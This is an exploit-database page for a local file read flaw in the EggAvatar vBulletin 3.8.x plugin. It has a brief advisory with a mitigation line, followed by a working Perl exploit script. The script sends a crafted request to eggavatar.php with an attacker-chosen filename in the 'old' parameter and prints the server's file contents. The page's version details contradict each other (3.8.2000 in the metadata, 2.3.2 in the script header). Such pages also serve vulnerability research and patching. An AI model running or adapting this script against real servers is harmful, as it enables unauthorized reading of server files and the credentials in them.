header-logo
Suggest Exploit
vendor:
EggAvatar
by:
DSecurity
8.8
CVSS
HIGH
Local File Read
20
CWE
Product Name: EggAvatar
Affected Version From: 3.8.2000
Affected Version To: 3.8.2000
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: vBulletin 3.8.0
2011

EggAvatar for vBulletin 3.8.x local file read

EggAvatar is a plugin for vBulletin 3.8.x which allows an attacker to read any file on the server by exploiting a vulnerability in the eggavatar.php file. The vulnerability is caused due to the improper validation of user-supplied input in the 'old' parameter of the 'eggavatar.php' script. This can be exploited to read any file on the server with the privileges of the webserver.

Mitigation:

Upgrade to the latest version of vBulletin 3.8.x and disable the EggAvatar plugin.
Source

Exploit-DB raw data:

#!/usr/bin/env perl
use LWP::UserAgent;
sub banner{
print "###################################\n";
print "############ DSecurity ############\n";
print "###################################\n";
print "# Email:dsecurity.vn[at]gmail.com #\n";
print "###################################\n";
}
if(@ARGV<2){
	print "Usage: $0 address filename\n";
	print "Example: $0 http://localhost/vbb test test index.php\n";
	exit();
}
$ua=LWP::UserAgent->new();
$ua->agent("DSecurity");

&banner;
print "\n#############################################################################################################\n";
print "# EggAvatar for vBulletin 3.8.x local file read                                      		           #\n";
print "# Date:07-03-2011                                                                                           #\n";
print "# Author: DSecurity					                                                    #\n";
print "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print "# Version: 2.3.2                                                                                            #\n";
print "# Tested on: vBulletin 3.8.0                                                                                #\n";
print "#############################################################################################################\n";


#Get info
my $response = $ua->get($ARGV[0].'/eggavatar.php?eggavatar.php?do=showeggs&u=1&old='.$ARGV[1]);
 
 if ($response->is_success) {
     print $response->decoded_content;  # or whatever
}
 else {
     die $response->status_line;
 }